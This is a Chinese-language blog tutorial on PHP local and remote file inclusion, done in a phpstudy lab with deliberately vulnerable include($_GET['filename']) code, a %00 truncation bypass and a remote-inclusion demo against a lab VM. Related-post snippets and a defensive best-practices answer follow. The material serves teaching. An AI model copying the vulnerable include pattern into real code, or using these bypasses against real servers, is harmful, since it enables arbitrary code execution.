文件包含漏洞的小点总结

最新推荐文章于 2025-06-11 17:43:33 发布
最新推荐文章于 2025-06-11 17:43:33 发布
阅读量628 收藏 3
点赞数 9
文章标签: web安全 安全 PHP 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_65853019/article/details/146922171
版权

文件本地与远程包含:

文件包含有本地包含与远程包含的区别:本地包含只能包含服务器已经有的问题;

远程包含可以包含一切网络上的文件。

  • 本地包含:

①无限制

感受一下使用phpstudy的文件上传,开启phpstudy的apache服务,在网站根目录新建两个文件

//1.txt 
<?php 
phpinfo(); 
?> 

//upload.php 
<?php 
$filename=$_GET['filename']; 
include($filename); 
?>

 

直接访问localhost/upload.php?filename=1.txt(upload.php文件内容意为使用GET方式将文件名参数传入,执行包含指令),访问如图(即使是txt文件,但是include会将其按php文件进行解析)

②有限制

如果服务器对上传的文件有限制,我们需要做绕过处理将文件包含进去。

在网站根目录下新建两个文件

//1.txt 
<?php 
phpinfo(); 
?>
 
//upload2.php 
<?php 
$filename=$_GET['filename']; 
include($filename.'.html') 
?>

如果直接访问localhost/upload2.php?filename=1.txt会报错,因为有限制,我们可以使用%00截断进行绕过。(%00具体解释参考往篇)访问localhost/upload2.php?filename=1.txt%00

长度截断:Windows和Linux对命名长度有限制,前者256个字符(磁盘分区还占一个,用户只能使用255个),后者4096

  • 远程包含:

phpstudy其他选项菜单-php扩展与设置-参数开关设置中打开allow_url_include(一般情况下为了安全性,这个是关的状态)

在远程服务器上上传文件(或者可以用虚拟机靶机做实验,在靶机的phpstudy上的根目录里写文件)如下:

//1.txt 
<?php 
phpinfo(); 
?>

靶机查询IP地址,假如是192.168.123.23

就可以在主机上直接访问http://192.168.123.23:88/1.txt

可以看到上传文件内容。

我们再使用文件包含,即访问http://localhost/upload.php?filename=http://192.168.123.23:88/1.txt即可执行文件内容。

sszdlbw
关注
文件包含漏洞
2301_80661529的博客
03-07 2399
文件包含(File Inclusion)漏洞是一种常见的Web应用程序安全漏洞,它源于开发者在编写代码时,对用户可控的输入参数未进行充分的验证和过滤,使得攻击者能够通过输入恶意的文件路径,促使服务器加载并执行该路径下的文件。本地文件包含(Local File Inclusion, LFI):攻击者能够通过注入本地文件路径,读取或执行服务器本地文件。例如,攻击者可能利用此漏洞读取服务器的配置文件,获取敏感信息,或者包含并执行恶意脚本,如Webshell,从而控制服务器php
文件包含漏洞全面详解
热门推荐
m0_46467017的博客
08-17 8万+
1.文件包含漏洞概述和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。...
CTF中文件包含漏洞总结
qq_64395221的博客
06-20 2297
通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。
文件包含漏洞总结
weixin_46739058的博客
04-10 2905
目录 #文件包含各个脚本代码 #文件包含漏洞的检测 #本地包含-无限制,有限制 #远程包含-无限制,有限制 #文件包含结合伪协议 #文件包含漏洞防范措施 文件包含的作用:将文件以脚本的格式执行(根据当前网站脚本类型) #文件包含各个脚本代码 第八个 C 语言那个,是包含远程文件,其余的是包含本地文件 文件包含php 中,涉及到的危险函数有四个,分别是include()、include_once()、require()、require_once()。 区别如下:
php本地文件包含漏洞,php文件包含漏洞利用小结
weixin_31860973的博客
03-09 2011
漏洞概述:文件包含漏洞是指客户端(一般为浏览器)用户通过输入控制动态包含在服务器的文件,从而导致恶意代码的执行及敏感信息的泄露,主要包括本地文件包含LFI和远程文件包含RFI两种形式。产生原因:在通过 PHP 的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入利用条件:1、用户能够控制这个动态变量2、include()等函数通...
文件包含漏洞详解
m0_55854679的博客
03-12 1万+
文章目录File Inclusion(文件包含)概述漏洞产生原因漏洞特点注小知识文件包含函数includerequireinclude_oncerequire_once文件包含示例pikachu靶场本地文件包含漏洞演示pikachu靶场远程文件包含漏洞演示文件包含漏洞的利用PHP伪协议(文件包含漏洞常用的利用方法)文件包含漏洞的防范措施phpMyadmin靶场练习 File Inclusion(文件包含)概述 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件
文件包含文件包含漏洞知识总结
Monsterlz123的博客
06-28 1万+
文件包含文件包含漏洞知识总结 Hello,各位小伙伴周五好~ 这里是你们的劳模小编~ 之前一期,我们已经一起总结了文件上传和文件解析漏洞。 今天我们就一起来看看文件包含漏洞吧~ 一、什么是文件包含漏洞? 1、文件包含概述 和SQL注入等攻击方式一样,文件包含漏洞也是一种“注入型漏洞”,其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行。 什么叫包含呢?以PHP为例,我们常常把...
网络安全——【文件包含漏洞
weixin_52620919的博客
08-24 1676
原理及危害 文件包含漏洞: 即File Inclusion,意思是文件包含漏洞)是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。 文件包含漏洞分为本地文件包含漏洞与远程文件包含漏洞,远程文件包含漏洞因为开启了php配置中的allow_url_fopen选项(选项开启.
DVWA—【文件包含漏洞】实验详解
weixin_52620919的博客
08-26 1814
LOW 实验关键代码 <?php $file = $_GET ['page'];//The page we wish to display ?> 这是一个典型的在动态网页中的用法,就像注我上一篇文章【文件包含漏洞原理】所讲,写入我们想要显示的页面。这里就是对用户的输入完全信任,因此就导致可以包含任意页面。 程序员在写程序的时候要站在不安全的角度上,而不是用户的角度上,这是从网站安全的角度来说。 实验: 接下来通过文件包含漏洞,查看位于根目录下的1.txt文件的内容,同过这两个实验对比总结远
文件包含漏洞详解 一文了解文件包含漏洞
闵行小鱼塘
11-07 2208
本篇总结归纳文件包含漏洞
【网络安全】-文件包含漏洞-pikachu
weixin_65311462的博客
09-11 2455
文件包含漏洞是指程序在执行过程中,将外部文件的内容作为程序代码或数据的一部分来执行使用,从而导致hacker可以利用这个漏洞包含恶意文件,执行任意代码进而访问敏感信息。1.本地文件包含漏洞与远程文件包含漏洞在防范措施上,两者都需要对用户输入进行严格的验证和过滤,但远程文件包含漏洞还需要特别注意禁用相关配置选项和限制外部资源的访问权限。
WEB安全文件包含漏洞(1)
2301_81685556的博客
06-21 1231
WEB安全文件包含漏洞
web安全文件上传、文件包含漏洞解析
vivlol918的博客
05-14 1370
文件上传漏洞是指攻击者通过页面上传图片、文件等途径,将恶意脚本等文件上传到服务器上,从而控制服务器,实现攻击目的。
网络安全之框架安全漏洞分析
anquan2233的博客
06-11 490
Struts2 是一个基于 MVC(Model-View-Controller)设计模式的 Web 应用框架,本质上可以看作是对 Servlet 的高级封装。在 MVC 架构中,Struts2 作为控制器(Controller)负责接收用户请求,并协调模型(Model)与视图(View)之间的数据交互。Struts2 是 Struts 的下一代产品,它融合了 Struts 1 和 WebWork 的技术优势,重构并推出了全新的框架架构。
【网络安全】SRC漏洞挖掘思路/手法分享
等风来
06-03 590
本文总结了多个实用的渗透测试技巧,涵盖接口安全、权限管理、数据泄露等多个方面。主要包括:主机URL复制差异、GET请求并发实现、密码明文获取方法、文件上传黑名单绕过、优惠券逻辑漏洞测试、用户信息越权访问、多重参数修改越权、复杂ID收集技巧、参数删除实现越权、权限管理参数空值测试、Cookie参数越权、Host头修改越权、并发测试场景、HTTP方法滥用、前端限制绕过、分隔符注入攻击、脏数据绕过频率限制、数组参数篡改以及邀请权限提升漏洞
【网络安全】Qt免杀样本分析
anquan2233的博客
06-06 1051
主程序(Qt)利用poolparty timer创建并调用shellcode,shellcode调用dll run函数,run函数给dll提权重新加载,提权后把shellcode注入winlogon.exe,在winlogon.exe中生成白加黑文件并为其创建计划任务(每两小时执行一次),白加黑文件重复前面所有,不过在run时就不需要提权了,因为计划任务是以SYSTEM身份运行的。
网络安全之防病毒系统
anquan2233的博客
06-11 168
只要是继承了MyController都需要session但是后面有几个不需要鉴权的Controller除了MyController还有一个ApiController,此控制器下都是不需要鉴权的问题点用户注册来看用户相关的控制器UserController,前面的几个方法开头都需要获取session中的username或者eid,这些都不是我们可以利用的点往后看找到regUserAction方法,直接从request中获取了我们传入的参数进行解密。
深度解读云防火墙(WAF):守护网络安全的智能卫士
最新发布
BEST_yundun的博客
06-11 812
一文了解云防火墙
总结防御文件包含漏洞的几种常见方法
03-20
<think>好的,用户想了解如何防御文件包含漏洞的最佳实践方法。首先,我需要回忆文件包含漏洞的基本概念和常见攻击方式。根据引用[3],攻击者可能通过上传恶意脚本、目录遍历、覆盖现有文件以及结合社会工程进行攻击。防御措施需要覆盖这些方面。 接下来,用户提到的引用[2]和引用[4]提供了具体的防御策略,比如最小权限原则、输入白名单过滤、固定文件列表等。我需要将这些策略整理成清晰的步骤,并确保涵盖所有关键点。 还要注意引用[4]提到的数据输入验证,特别是文件路径参数的检查和白名单策略。这部分需要详细说明如何实施,例如限制文件路径的格式和类型。 另外,用户可能希望方法总结结构清晰,分点列出,便于理解和实施。可能需要将最佳实践分为几个主要类别,如权限控制、输入验证、环境加固等,每个类别下再细分具体措施。 还需要检查是否有遗漏的防御点,例如服务器配置、日志监控等。引用[3]中提到的防御措施可能包括更新和打补丁,这也是重要的一点。 最后,确保回答符合用户的要求,使用中文,行内公式正确,引用标识自然添加。同时生成相关问题,帮助用户进一步学习。</think>### 如何防御文件包含漏洞?最佳实践总结 文件包含漏洞(LFI/RFI)允许攻击者通过动态加载机制执行恶意代码或泄露敏感文件。以下是防御的核心方法: --- #### **1. 权限最小化原则** - **文件系统权限**:限制Web服务器进程仅能访问必要的目录和文件(如上传目录不可执行),禁止访问系统关键路径[^2]。 - **禁用危险函数**:在PHP中关闭`allow_url_include`和`allow_url_fopen`,避免远程文件包含[^4]。 --- #### **2. 输入验证与过滤** - **白名单控制**: - 仅允许预定义的安全字符(如`a-zA-Z0-9_-`),拒绝`../`、`://`等危险符号[^4]。 - 使用正则表达式验证文件路径格式,例如:`^[a-z]+/[a-z]+\.php$`。 - **固定文件映射**: - 将用户输入映射到固定文件列表,如`$file = ["page1" => "template/page1.php", ...]`。 --- #### **3. 路径隔离与规范化** - **根目录锁定**:使用`chroot`或`open_basedir`限制文件操作范围,例如: ```php ini_set('open_basedir', '/var/www/html/uploads'); ``` - **路径解析规范化**:使用`realpath()`解析绝对路径,并检查是否在允许范围内。 --- #### **4. 环境加固与更新** - **禁用动态包含**:避免直接使用用户输入拼接包含路径,如`include($_GET['module'] . '.php')`。 - **依赖库更新**:及时修补框架(如ThinkPHP、Laravel)中的文件包含漏洞。 --- #### **5. 日志监控与应急响应** - 记录异常文件访问行为(如尝试包含`/etc/passwd`)。 - 部署WAF拦截包含`../`或`php://filter`等特征的请求[^1]。 --- #### **示例:安全包含逻辑** ```php $allowed_pages = ['home', 'contact']; $page = $_GET['page']; if (in_array($page, $allowed_pages)) { include("templates/$page.php"); } else { die("Invalid request"); } ``` --- ### 相关问题 1. 文件包含漏洞如何与文件上传漏洞结合利用?[^3] 2. 如何通过服务器配置防御路径穿越攻击? 3. 在云环境中(如使用EdgeOne),如何增强文件包含漏洞的防护? --- 通过以上方法,可显著降低文件包含漏洞风险。核心思路是 **严格控制输入、最小化权限、隔离执行环境** 。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值